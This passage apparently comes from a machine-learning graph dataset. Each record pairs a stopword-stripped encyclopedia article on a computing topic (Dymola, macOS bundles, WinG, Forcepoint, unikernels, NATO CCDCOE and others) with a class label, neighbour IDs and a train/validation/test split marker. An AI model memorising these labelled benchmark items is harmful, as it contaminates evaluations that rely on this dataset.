    "text": "Tim_Teitelbaum:tim teitelbaum ray tim teitelbaum born april 12 1943 united states american computer scientist known early work integrated development environments ides syntax-directed editing incremental computation educator faculty member cornell university computer science department since 1973 recognized large-scale teaching introductory programming mentoring highly successful graduate students businessman known co-founded grammatech inc. sole ceo since 1988 teitelbaum educated massachusetts institute technology carnegie mellon university 1978 teitelbaum created cornell program synthesizer one seminal systems demonstrated power tightly integrating collection program development tools deeply knowledgeable programming language semantics one unified framework 45 lectures demonstrations early ide 1979-82 well credo 1981 paper co-authored thomas reps asserted programs text hierarchical compositions computational structures edited executed debugged environment consistently acknowledges reinforces viewpoint motivated importance immediate feedback interactive systems ides teitelbaum ’ research 1980s 1990s focused problem incremental computation given program p written language l result executing p input x one efficiently determine result running p input x ’ difference x x ’ small increment x ’ -x body work graduate students teitelbaum investigated problem range languages l included attribute grammars sql first-order functional languages lambda calculus addition incremental evaluation methods work also included program transformation methods i.e. automatic derivation p incremental program p ’ executing p ’ previous result p x increment x ’ -x auxiliary information retained previous executions efficiently performs computation executing p input x ’ teitelbaum recent work aimed design implementation tools assist making software safer secure techniques include static program analysis dynamic program analysis source code machine code teitelbaum co-recipient association computing machinery sigsoft retrospective impact paper award 2010 1984 paper co-authored thomas reps synthesizer generator",
    "neighbors": [
      8262,
      10413,
      7634,
      2675,
      4980,
      1783,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 10763,
    "label": 6,
    "text": "2_GB_limit:2 gb limit 2 gb limit refers physical memory barrier process running 32-bit operating system use maximum 2 gb memory problem mainly affects 32-bit versions operating systems like microsoft windows linux although variants latter overcome barrier also found servers like ftp servers embedded systems like xbox use physical address extension pae help overcome barrier linux freebsd unix-likes support pae long hardware windows needs boot option enabled manually known 4-gigabyte tuning 4gt /3gb switch enabled executables large address aware flag set increase memory limit 3gb 32-bit processes 64-bit windows also limited 2gb however use large address aware flag well except n't require /3gb switch increases limit 4gb could also refer maximum partition size fat16 file system versions windows prior xp",
    "neighbors": [
      9762,
      5356,
      5293,
      6797,
      7983,
      823,
      4763
    ],
    "mask": "None"
  },
  {
    "node_id": 10764,
    "label": 9,
    "text": "Dymola:dymola dymola commercial modeling simulation environment based open modelica modeling language large complex systems composed component models mathematical equations describe dynamic behavior system developed european company dassault systèmes dymola available standalone product integrated 3dexperience part catia dymola 2020 supports version 3.4 modelica language version 3.2.3 modelica standard library well versions 1.0 2.0 functional mock-up interface fmi dymola initially designed 1978 hilding elmqvist phd thesis lund institute technology later part lund university first version dymola based dynamic modeling language also called dymola implemented simula 67 later re-implemented pascal c++ 1992 elmqvist created swedish company dynasim ab continue development dymola 2006 dassault systèmes acquired dynasim ab started integrate dymola catia 1996 elmqvist initiated modelica design effort goal develop object-oriented language modeling technical systems reuse exchange dynamic system models standardized format modelica based dymola language experience modeling languages taken account september 1997 version 1.0 modelica specification released basis prototype implementation within dymola year 2000 non-profit modelica association formed manage continually evolving modelica language development free modelica standard library since 2002 modelica language supported dymola dymola multi-engineering capabilities mean models consist components many engineering domains using modelica language sub-systems represented interconnected components lowest level dynamic behavior described mathematical equations algorithms connections components form additional equations dymola processes complete system equations order generate efficient simulation code domain-specific knowledge represented modelica libraries containing components mechanical electrical control thermal pneumatic hydraulic power train thermodynamics vehicle dynamics air conditioning etc commercial libraries dymola supports information hiding encryption typical application areas facilitated modelica libraries include automotive applications fall three main categories engine drive train modeled using engines powertrain libraries flexibility open modelica language particularly suitable modeling hybrid alternative drive trains using battery brushless dc drives electrified powertrains libraries modal bodies flexible shafts available flexible bodies library engine battery cooling supported cooling library combined hvac library human comfort library adds models occupant comfort complete vehicle thermal modeling controller components available modelica standard library hierarchically structured open-source modelica models offer unprecedented flexibility multiple vehicle configurations reusing common components multitude libraries offer capacity model complex thermo-fluid systems aircraft ranging fuel systems environmental control human comfort library provides additional models occupant comfort cabin thermal modeling flight dynamics library enables rapid modeling simulation analysis flight dynamic characteristics wide range aircraft uavs actuators flight control subsystems use brushless dc drives electrified powertrains libraries flexible beams modal bodies finite element models managed flexible bodies library ever stringent requirements environmental impact drive trend towards detailed modeling physics control systems heat ventilation air conditioning hvac library allows minimize building hvac operating costs selecting correct system control strategy avoid costly hvac system design errors early building design process human comfort library provides integrated approach simulate thermal comfort within occupied building vehicle thermo-fluid system typically modeled thermalsystem library industrial process simulation library focused paper pulp industries kinds industrial equipment modeled using mechanical libraries modelica standard library including 3d multi-body systems options flexible beams modal bodies originating finite element model actuators control systems modeled battery brushless dc drives electrified powertrains libraries thermal properties industrial machinery easily modeled cooling library addition libraries available dymola product portfolio several libraries developed third parties claytex modelon ab tlk-thermo xrg simulation additional free commercial libraries available modelica association homepage model calibration option based process measured data real device used tune parameters simulation results good agreement measured data design optimization option used tune parameters device controller improve system dynamics multiple criteria multiple cases model management includes support encryption models version control dymola utilities checking testing comparing models also included support common version management tools cvs svn git steps system development dimensioning detailed design implementation important access c code image model run hardware loop rapid prototyping simulations build simulators validation training purposes several options available achieve activities dymola supports import export according functional mockup interface fmi appropriate options exported code generated export without run-time license source code exported functional mockup units used several simulation platforms",
    "neighbors": [
      9376,
      8162,
      1668,
      4454,
      10568,
      587,
      8524,
      4919,
      6797,
      3567,
      7983,
      499,
      823,
      1917
    ],
    "mask": "Test"
  },
  {
    "node_id": 10765,
    "label": 2,
    "text": "Bundle_(macOS):bundle macos nextstep openstep gnustep lineal descendants macos ios bundle file directory defined structure file extension allowing related files grouped together conceptually single item examples bundles contain executable code include applications frameworks plugins kind bundle usually contains one file representing executable code files represent resources nibs templates images sounds media systems microsoft windows resources usually included directly executable file compile time older macintoshes similar technique used additional metadata added file resource fork similar concept application directories used risc os rox desktop examples bundles contain executable code include document packages iwork documents media libraries iphoto library bundles programmatically accessed codice_1 class cocoa nextstep gnustep foundation frameworks codice_2 core foundation uniform type identifier uti apple bundle codice_3 application bundles directory hierarchies top-level directory name ends codice_4 extension application bundle first directory bundle underneath top-level directory usually named codice_5 within codice_5 usually another directory called codice_7 macs using application name gnustep contains application executable code within codice_5 folder usually also directory called codice_9 contains resources application among things codice_9 folder contains localized versions application nib files common subdirectories include codice_11 codice_12 codice_13 codice_12 directory contains frameworks used application used even another version framework exists system codice_13 directory contains frameworks used application contains applications used newer version exist elsewhere system codice_11 contains extensible code used application default finder displays application bundles also referred packages opaque files underlying structure contents bundle shown show package contents context menu item macos frameworks also stored bundles top-level directory framework bundle name name framework followed extension codice_17 top-level directory codice_18 directory subdirectories one versions framework subdirectory containing dynamic library code framework file whose name name framework possibly codice_19 folder containing header files framework subfolders codice_9 codice_18 directory also contains symbolic link codice_22 directory current version framework top-level directory symbolic links contents codice_23 finder displays framework bundles directories rather opaque files loadable bundles bundles contain code loaded runtime loadable bundles usually extension codice_24 often used plug-ins macos way load bundles even applications n't support allowing third party hacks popular applications safari apple mail default finder displays loadable bundles also referred packages opaque files underlying structure contents bundle shown show package contents context menu item many third-party macos applications utilize custom bundle format e.g candybar codice_25 aperture codice_26 vmware fusion codice_27 etc. .lproj file bundle contains localization files macos software typically contains .nib files given language along string files images need example readme license files localized files used install makers customize install packages also included application bundle",
    "neighbors": [
      4544,
      10176,
      10406,
      3691,
      9035,
      6797,
      3790,
      8303,
      8304,
      3889,
      9451,
      10221,
      2804,
      4406,
      4571,
      7422
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10766,
    "label": 4,
    "text": "Centre_for_Cybersecurity_&_Cybercrime_Investigation:centre cybersecurity amp cybercrime investigation university college dublin centre cybersecurity cybercrime investigation ucd cci centre research education cybersecurity cybercrime digital forensic science dublin ireland ucd centre cybersecurity cybercrime investigation established early 2000s developed collaborative relationships law enforcement industry across world centre cybersecurity cybercrime investigation widely regarded europe leading centre research education cybersecurity cybercrime digital forensics ucd cci trains specialist officers irish national police service garda síochána irish military personnel defence forces well international law enforcement agencies interpol europol authorities 40 countries cci also runs educational qualifications training industry sector multinational corporations memorandum understanding centre cybersecurity cybercrime investigation ucd national cyber security centre ncsc dccae irish government computer emergency response team ucd cci network formal relationships garda síochána irish defence forces interpol europol visa inc. irish banking federation well collaborations united nations office drugs crime unodc organization security co-operation europe osce european anti-fraud office olaf microsoft citibank ebay director ucd centre cybersecurity cybercrime investigation professor joe carthy bsc. phd",
    "neighbors": [
      11089,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10767,
    "label": 3,
    "text": "WDC_65C134:wdc 65c134 western design center wdc w65c134s microcontroller complete fully static 8-bit computer fabricated single chip using low power cmos process w65c134s complements established growing line 65xx products wide range microcomputer applications w65c134s developed hi-rel applications minimum power required w65c134s consists w65c02s static central processing unit cpu 4096 bytes read memory rom 192 bytes random access memory ram two 16 bit timers low power serial interface bus sib configured token passing local area network universal asynchronous receiver transmitter uart baud rate timer one 16-bit monitor watch-dog timer restart interrupt twenty-two priority encoded interrupts ice interface real-time clock features including time day tod clock bus control register bcr external memory bus control interface circuitry peripheral devices many low power features innovative architecture demonstrated high performance w65c02s cpu well instruction simplicity result system cost-effectiveness wide range computational power features make w65c134s leading candidate hi-rel microcomputer applications product description assumes reader familiar w65c02s cpu hardware programming capabilities refer w65c02s data sheet additional information",
    "neighbors": [
      7170,
      11395,
      6925,
      1170,
      7445,
      664,
      10784,
      4385,
      4773,
      7589,
      9638,
      682,
      11054,
      2224,
      11314,
      10945,
      3010,
      7235,
      9928,
      6607,
      3157,
      6485,
      9685,
      4569,
      10969,
      5862,
      9964,
      11374,
      10351,
      1776,
      5617,
      7281,
      7282,
      7284,
      8700
    ],
    "mask": "Train"
  },
  {
    "node_id": 10768,
    "label": 3,
    "text": "Palmtop_PC:palmtop pc palmtop pc approximately pocket calculator-sized battery-powered computer compatible ibm personal computer horizontal clamshell design integrated keyboard display could used like subnotebook light enough comfortably used handheld well palmtop pcs small enough stored user shirt jacket pocket palmtop pcs distinguish palmtop computers using mostly ibm-compatible pc architecture bios well intel-compatible x86 processor devices dos-based dos stored rom many palmtop pcs came number pda office applications pre-installed rom could also run generic off-the-shelf pc software little modifications could also run operating systems geos windows 1.0-3.0 real mode minix 2.0 palmtop pcs based static hardware design low power consumption instant-on/off without need reboot depending model battery could power device several hours several days running week year standby mode combined instant-on/off feature battery would typically last week several months practical use pda first palmtop pc dip pocket pc aka atari portfolio 1989 palmtop pcs include touch-screen computers may also counted category clamshell design now-discontinued ultra-mobile pcs umpc seen successors class example",
    "neighbors": [
      1480,
      6090,
      7243,
      8044,
      9166,
      10223,
      3281,
      3537,
      499,
      5681,
      6129,
      5080,
      6618,
      1083
    ],
    "mask": "Test"
  },
  {
    "node_id": 10769,
    "label": 2,
    "text": "WinG:wing computing wing pronounced win gee application programming interface designed provide faster graphics performance windows 3.x operating environments initially positioned way help game developers easily port dos games microsoft windows although quickly discontinued favor directx wing fixed two problems first problem wing fixed windows 3.x support creating device contexts dcs based device independent bitmaps actual display devices one major limitation gdi dcs write-only data written could retrieved second problem gdi drawing implemented windows 3.x video drivers included drawing bitmaps obviously performance routines varied across drivers alex st. john one creators directx said 2000 interview microsoft announced wing 1994 game developers conference demonstrating port id software doom wing shipped september 21 1994 wing interesting still fundamentally based drawing bitmaps memory outputting frames drawing done result wing deprecated directx built however windows nt 3.5 windows 95 introduced createdibsection provide support creating dcs based dibs video drivers also eventually improved wing introduced new type dc called wingdc allowed programmers read write directly using device-independent bitmaps dibs wingdib.drv driver effectively gave programmers ability windows 'd without hardware access limitations dos years programmers could write dibs wingdc yet would still access individual bits image data meant fast graphics algorithms could written allow fast scrolling overdraw dirty rectangles double buffering animation techniques wing also provided much better performance blitting graphics data physical graphics device memory since wing used dib format possible mix original gdi api calls wing calls wing would also perform graphics hardware/driver profiling test first execution program order determine best way draw dibs test showed window full red curved lines sections would wobble performance tested wing determined fastest calls cause graphics corruption profile would saved test would need performed wing out-of-the-box support i.e separate api win32 dropped windows 98 second edition integrated directx 6 absolutely nothing pass win32 apis wrapping including createdibsection wing dlls sometimes distributed application point merely became matter copying files wing.dll wing32.dll wingde.dll wingdib.drv wngpal.wnd system32 directory 32 bit windows syswow64 directory 64 bit windows regain system-wide support",
    "neighbors": [
      5761,
      10243,
      9348,
      5765,
      10886,
      2183,
      9609,
      5259,
      653,
      6797,
      6927,
      9234,
      1043,
      3224,
      5401,
      5913,
      5119,
      11546,
      10654,
      1055,
      4384,
      8607,
      10658,
      2083,
      4771,
      8227,
      2854,
      7846,
      10024,
      1577,
      10026,
      6827,
      10029,
      10414,
      4143,
      9263,
      11570,
      8246,
      6584,
      2493,
      5952,
      1348,
      844,
      7629,
      4178,
      9813,
      214,
      9434,
      603,
      10079,
      736,
      4321,
      6114,
      6370,
      4836,
      8161,
      11616,
      1770,
      11498,
      9196,
      3821,
      4590,
      10991,
      11247,
      3573,
      10229,
      1656,
      5754,
      9340,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 10770,
    "label": 2,
    "text": "Nokia_N86_8MP:nokia n86 8mp nokia n86 8mp high-end smartphone announced 17 february 2009 released may 2009 runs symbian os 9.3 s60 3rd edition fp2 part nseries shares similar design features n97 one main selling points carl zeiss photography features nokia first camera phone 8 megapixel sensor although late compared manufacturers features multiple aperture settings mechanical shutter uncommon features standards camera phones carl zeiss lens wide angle view 28 mm equivalent also auto focus dual led flash 3rd generation dual-leds af assist light video capture resolution 640 × 480 pixels vga 30 frames per second n86 continuous form factor nokia n95 n85 dual-sliding form factor whilst adding toughened glass front cover metal detailing keypad making look feel premium 2.6-inch amoled display fast 434 mhz processor 8 gb internal memory also kickback stand n85 possible use small standalone screen possible configure opening stand launch applications video player also supports n-gage gaming platform n86 8mp regarded spiritual successor n95 8gb due feature set sliding form factor commercial failure n96 regard successor n82 due camera n86 8mp 3.5g 3.75g 3gpp device dual-band hsdpa support quad-band gsm wi-fi a-gps receiver links location-based services via nokia maps photographs automatically geo-tagged also built-in digital compass fm radio also fm transmitter rated give 6 hours talktime 25 hours music playback 11 days standby full charge optional dvb-h nokia mobile tv receiver su-33w possible watch television screen phone ovi maps 3.03 free navigation released 17 march 2010 nokia n86 new version available via sw update application file size 8.24 mb n86 e72 e55 e52 6730 6710 s60 3rd edition feature pack 2 nokia symbian^1 s60 5th edition devices get experience beta-testing free navigation 6 july 2009 nokia n86 8mp received big firmware upgrade v11.043 brought official ovi store compatibility ovi web site shortcut option download dedicated client camera tweaks usual early firmware bug fixes improvements 30 september 2009 nokia n86 8mp received v20 firmware upgrade full week ahead schedule 8 mb large air ota update significant changes improved still image video quality close-up focus face detection indicated yellow square red-eye removal added new focus point indication shows scene camera focusing 11 january 2010 nokia n86 8mp got minor update v21 firmware version 21.006 replaced v20.115 maintenance release improving performance fixing number minor bugs 15 april 2010 version 30.009 firmware mainly features latest ovi maps client available via nokia software update 142 mb air 5085 kb includes latest ovi maps 3.03 free navigation sharing location via facebook realplayer interface tweaked d-pad problem playing videos usual minor fixes improvements 20 may 2010 includes latest ovi maps 3.04 new version adds formal support wifi positioning method part overhaul positioning functionality plus significant performance improvements search zooming map panning number consumer-friendly ui tweaks addition qype information places database nokia n87 successor n86 leaked internet full specifications december 2009 early 2010 however never released instead touchscreen nokia n8 introduced november 2010 prototype n87 appeared ebay shows running probably symbian^3 listing removed time seller nokia would never release another high-end non-touchscreen device n86 8mp",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10771,
    "label": 9,
    "text": "Pry_(software):pry software pry interactive shell ruby programming language notable smalltalk-inspired ability start repl within running program lets programmers debug modify current state system pry exposes introspective capabilities using filesystem metaphor example codice_1 command start interacting particular object uses codice_2 list methods variables possible start pry point inside running program due reflective nature ruby lets programmer inspect program change current state correct source code without restarting process number third party plugins available pry add tighter integration ruby projects enhance abilities pry make pry available remote connection",
    "neighbors": [
      7430,
      9229,
      2191,
      655,
      7695,
      7325,
      9245,
      7983,
      564,
      4277,
      5945,
      1852,
      5567,
      6338,
      11208,
      5578,
      9946,
      10973,
      2786,
      1379,
      6502,
      11625,
      8554,
      5612,
      2804,
      6134
    ],
    "mask": "None"
  },
  {
    "node_id": 10772,
    "label": 4,
    "text": "Forcepoint:forcepoint forcepoint previously known websense raytheon|websense austin-based company owned u.s. defense contractor raytheon private equity firm vista equity partners develops markets cybersecurity software prevent employees viewing inappropriate malicious content leaking confidential data also sells firewall cloud access cross-domain security products forcepoint founded 1994 reseller called netpartners renamed websense 1999 went public following year vista equity partners acquired websense 2013 906 million taking public market raytheon acquired 80 interest websense april 2015 1.9 billion afterwards websense acquired network security vendor stonesoft intel renamed combined company forcepoint websense founded 1994 phil trubey dot-com boom name netpartners company began reseller network security products developed software controlling internet use employees 1998 netpartners raised 6 million venture capital funding 6 million annual revenue later year investors pushed trubey ceo position appointed john carrington replacement 1999 netpartners renamed websense following year websense raised 65.7 million initial public offering 2006 former mcafee ceo gene hodges succeeded carrington websense ceo year websense acquired fingerprint security company called portauthority 90 million followed 400 million acquisition email security vendor surfcontrol 2007 2009 websense acquired defensio spam malware company focused social media undisclosed sum 2009 websense 1,400 employees offices england china australia israel two years later facebook deployed websense check every link users shared site 2013 websense became private company vista equity partners acquired 906 million websense headquarters moved san diego year austin texas 2014 raytheon acquired 80 interest websense april 2015 1.9 billion followed 389 million purchase two companies stonesoft sidewinder october 2015 intel stonesoft network security product previously known mcafee next-generation firewall sidewinder firewall previously known mcafee firewall enterprise january 2016 three companies combined rebranded forcepoint new company also included raytheon cyber products business time forcepoint 2,000 employees one-third customers departments federal government united states forcepoint became smallest five major businesses owned raytheon highest profit margins following year forcepoint began shuffling executives re-organization effort included layoffs company divided four business units cloud security network security data insider threat security global governments february 2017 forcepoint announced acquisition cloud-based access broker casb security product imperva called skyfence undisclosed sum april 2016 matthew moynahan appointed ceo forcepoint august 2017 forcepoint acquired user entity behavior analytics company redowl undisclosed amount company products used block certain websites portions website inspect network traffic filter e-mails control sensitive files accessed forcepoint products also used prevent employees accessing websites deemed inappropriate workplace viewing employer example employers may prevent employees viewing pornographic content work material sex education religion dating politics forcepoint also develops markets firewall products based part technology acquired mcafee former stonesoft business intel security sidewinder product. ref name= http //www.channelweb.co.uk 2017 /ref company develops markets cloud access security broker casb products using technology acquired previously imperva skyfence product also sells analytics software detect insider data leaks several cross domain security products using forcepoint products employees internet browsers usually modified direct traffic proxy server server hosts local copies frequently-visited websites order improve download speed software also checks every url employee visits databases websites identified malware prohibited subject-matter employee url history analyzed identify risky behaviors 1997 three years forcepoint founded company published version 3 software version 3.0 introduced software first graphical web-based administrative user interface time forcepoint software used prevent employees viewing certain types content work 2006 features added detect employees attempting visit websites suspected hosting malicious code 2007 websense introduced product control content user see social media websites endpoint security product website reputation ranker small business version additionally product added websense suite identifies sensitive files un-secure locations corporate network looks records files transmitted websense introduced first appliance product 2009 following year products consolidated triton software became responsible increasingly large portions company revenue february 2012 forcepoint released cloud-based suite security products smartphones tablets laptops usb drives mobile devices upgrades suite 2012 added ability identify confidential information image file three new products revisions introduced 2016 focused security risks caused employees forcepoint policy selling governments isps engage internet censorship however criticized perceived link censorship free speech dissemination knowledge 2009 discovered yemeni government using forcepoint products monitor public internet use block tools allow citizens hide internet use government software alkasir created circumvent forcepoint responded cutting country access forcepoint database updates 2011 forcepoint said would join global network initiative focused privacy internet freedom left initiative 2014 2002 study jama found forcepoint best-performing web-filtering products terms blocking pornography allowing health information contrast 2005 report rhode island branch american civil liberties union said forcepoint blunt instrument public libraries equipped forcepoint people ages still denied access wide range legitimate material 2006 report brennan center justice found forcepoint often blocked websites discussed pornography actually feature pornography forcepoint software also blocked furniture website called the-strippers.com pornographic instead website furniture refinisher author study 0-15 percent sites blocked forcepoint viewable user 10 percent objectionable websites let rather blocked according blogger jillian york forcepoint blocks pages contain pornographic links anywhere content even comments section said malicious attacker could get whole site blocked time simple procedure leaving dangerous malicious pornographic links blog comments approximately 15 minutes 2009 forcepoint classified router company cisco website 'hack sites due one cisco ip addresses named hacking website ip address reviewed deemed threat",
    "neighbors": [
      3520,
      11104,
      1994,
      3885,
      11470,
      9855,
      9817,
      3962,
      10523,
      5373,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 10773,
    "label": 4,
    "text": "AssureSign:assuresign assuresign electronic signature software solution deployed software service saas application installed customer premises documents signed using computer internet connection assuresign electronic signature technology first use patent-pending biometric handwritten mouse-based signatures assuresign documentnow documenttrak api tools enable users integrate existing environments assuresign maintains partner program includes integration partners resellers available via microsoft dynamics marketplace salesforce.com appexchange assuresign also integrated third party applications including microsoft sharepoint oracle duck creek technologies insurance applications assuresign electronic signature technology developed 2006 offering third party verification inc. 3pv assuresign llc formed separate company 2008 david brinkman dale combs assuresign 3pv consistently ranked orlando sentinel top 100 companies working families",
    "neighbors": [
      10090,
      467,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 10774,
    "label": 6,
    "text": "Union_mount:union mount computer operating systems union mounting way combining multiple directories one appears contain combined contents union mounting supported linux bsd several successors plan 9 similar subtly different behavior example application union mounting consider need update information contained cd-rom dvd cd-rom writable one overlay cd mount point writable directory union mount updating files union directory cause end writable directory giving illusion cd-rom contents updated plan 9 operating system bell labs mid-1980s onward union mounting central concept replacing several older unix conventions union directories example several directories containing executables unioned together single directory replace variable command lookup shell plan 9 union semantics greatly simplified compared implementations posix-style operating systems union two directories simply concatenation contents directory listing union may display duplicate names also effort made recursively merge subdirectories leading extremely simple implementation directories unioned controllable order union directory denotes file called first constituent directory contains file unix/posix implementations unions different requirements plan 9 implementation due constraints traditional unix file system behavior greatly complicates implementation often leads compromises problems union mounting unix-like operating systems encounters include early attempts add unioning unix filesystems included 3-d filesystem bell labs translucent file service sunos sun microsystems 1988 implementation union mounting added bsd version unix version 4.4 1994 taking inspiration earlier attempts plan 9 stackable file systems spring sun 1994 4.4bsd implements stack-of-directories approach outlined like plan 9 operations traverse stack top-down resolve names unlike plan 9 bsd union mounts recursive contents subdirectories appear merged union directory also unlike plan 9 version layers except top read-only modifying files union causes contents first copied top layer stack modifications applied deletion files implemented writing special type file called whiteout top directory effect marking file name non-existent hiding files name lower layers stack whiteouts require support underlying file system union mounting implemented linux 0.99 1993 initial implementation called inheriting file system abandoned developer complexity next major implementation unionfs grew fist project stony brook university attempt replace unionfs aufs released 2006 followed 2009 overlayfs 2014 last union mount implementation added standard linux kernel source code similarly glusterfs offers possibility mount different filesystems distributed across network rather located machine",
    "neighbors": [
      8214,
      6947,
      5158,
      2479,
      7728,
      7983,
      1844,
      2230,
      823,
      9151,
      9665,
      8772,
      10436,
      8395,
      9693,
      2397,
      2910,
      8298,
      5363,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 10775,
    "label": 4,
    "text": "Anatoly_Kucherena:anatoly kucherena anatoly grigorievich kucherena born 23 august 1960 russian attorney public figure doctor law professor mid-2013 kucherena represented former nsa contractor edward snowden interests russian federation kucherena continues represent snowden pro bono occasional basis 2013 according izvestia known person spoke favour banning anonymizer software advocating prosecution development distribution usage including malware software category view contradicts terminology used industry june 2014 american film director oliver stone acquired rights screen adaptation kucherena novel time octopus story fictional american whistleblower joshua kold threatened government waiting decision request russian asylum cold spends three weeks transit area moscow airport stone said anatoly written 'grand inquisitor'-style russian novel weighing soul fictional whistleblower gravity 1984 tyranny achieved global proportions book first psychological-political thriller trilogy released 3 march 2015 russian 29 january 2017 english moscow times reported kucherena said snowden received copy book liked april 2015 wikileaks revealed oliver stone paid 1 million movie rights kucherena novel different times kucherena also represented",
    "neighbors": [
      7515,
      2958,
      3495
    ],
    "mask": "Test"
  },
  {
    "node_id": 10776,
    "label": 3,
    "text": "Unikernel:unikernel unikernel specialised single address space machine image constructed using library operating systems developer selects modular stack minimal set libraries correspond os constructs required application run libraries compiled application configuration code build sealed fixed-purpose images unikernels run directly hypervisor hardware without intervening os linux windows first systems exokernel nemesis late 1990s library operating system protection boundaries pushed lowest hardware layers resulting library os architecture several advantages disadvantages compared conventional os designs one advantages since single address space need repeated privilege transitions move data user space kernel space therefore library os provide improved performance allowing direct access hardware without transition user mode kernel mode traditional kernel transition consists single trap instruction context switch performance gains may realised elimination need copy data user space kernel space although also possible zero-copy device drivers traditional operating systems disadvantage separation trying run multiple applications side side library os strong resource isolation become complex addition device drivers required specific hardware library os runs since hardware rapidly changing creates burden regularly rewriting drivers remain date os virtualization overcome drawbacks commodity hardware modern hypervisor provides virtual machines cpu time strongly isolated virtual devices library os running virtual machine needs implement drivers stable virtual hardware devices depend hypervisor drive real physical hardware however protocol libraries still needed replace services traditional operating system creating protocol libraries bulk work lies implementing modern library os additionally reliance hypervisor may reintroduce performance overheads switching unikernel hypervisor passing data hypervisor virtual devices reducing amount code deployed unikernels necessarily reduce likely attack surface therefore improved security properties unikernels shown around 4 size equivalent code bases using traditional os due nature construction possible perform whole-system optimisation across device drivers application logic thus improving specialisation unikernels regularly shown boot extremely quickly time respond incoming requests requests time-out unikernels lend creating systems follow service-oriented microservices software architectures high degree specialisation means unikernels unsuitable kind general purpose multi-user computing traditional operating systems used adding additional functionality altering compiled unikernel generally possible instead approach compile deploy new unikernel desired changes number new approaches constructing unikernels varying degrees maturity",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      25,
      4637,
      9245,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      9964,
      5872,
      242,
      5363,
      8439,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      6438,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      6974,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      3960,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      1435,
      8092,
      11675,
      2462,
      5022,
      8094,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10777,
    "label": 4,
    "text": "Cooperative_Cyber_Defence_Centre_of_Excellence:cooperative cyber defence centre excellence nato ccd coe officially nato cooperative cyber defence centre excellence nato küberkaitsekoostöö keskus one nato centres excellence located tallinn estonia centre established 14 may 2008 received full accreditation nato attained status international military organisation 28 october 2008 nato cooperative cyber defence centre excellence international military organisation mission enhance capability cooperation information sharing among nato member nations partners cyber defence virtue education research development lessons learned consultation 2003 prior country official accession nato estonia proposed creation centre excellence 2006 riga summit listed possible cyber attacks among asymmetric threats common security acknowledged need programs protect information systems long term cyber attacks estonia 2007 highlighted first time potential vulnerability nato countries institutions societies even nato disruption penetration information communications systems estonia proposals nato cyber excellence center received strong support alliance secretary-general jaap de hoop scheffer nato completed assessment situation partly light estonia experience april 2007 approved nato policy cyber defence january 2008 nato summit communiqué bucharest april announced nato readiness provide capability assist allied nations upon request counter cyber attack august 30 2018 colonel jaak tarien replaced merle maigre director organisation cyber defence center tallinn one 21 accredited centres excellence coes training technically sophisticated aspects nato operations funded nationally multi-nationally centers closely linked allied command transformation promote alliance-approved transformation goals main agenda facility centre also responsibilities include currently 22 sponsoring nations joined centre addition centre three contributing participants nato ccd coe founding nations estonia germany italy latvia lithuania slovakia spain hungary poland united states netherlands joined following years 2014 france united kingdom czech republic austria first non-nato country joined centre november 2015 finland greece turkey joined june 2019 bulgaria denmark norway romania joined membership nato ccd coe open nato nations nato ccd coe also establish cooperative relations non-nato nations universities research institutions businesses contributing participants",
    "neighbors": [
      9688,
      4689,
      9246
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10778,
    "label": 9,
    "text": "Big_ball_of_mud:big ball mud big ball mud software system lacks perceivable architecture although undesirable software engineering point view systems common practice due business pressures developer turnover code entropy type design anti-pattern term popularized brian foote joseph yoder 1997 paper name defines term foote yoder credited brian marick originator 'big ball mud term sort architecture programmers control big ball mud project strongly encouraged study understand accomplishes use loose basis formal set requirements well-designed system could replace technology shifts client-server web-based file-based database-based may provide good reasons start scratch discussion lisp programming language term big ball mud used differently case describe malleability lisp system lisp generally possible result confluence features lisp extraordinarily flexible even extent language implementation may completely rewritten runtime i.e reflective metaprogramming result lisp systems becoming muddy time due fluidity ease may extended evolve simple use metalinguistic abstraction prominent characteristic lisp also allows programmers develop entirely new idiosyncratic conceptual vocabularies describe processes functions programs go tackling problem domain combined poor software documentation result lisp systems work quite well indeed quite well-structured design perspective comprehensible original coders anyone else willing invest time sift layers highly recursive code joel moses credited coining 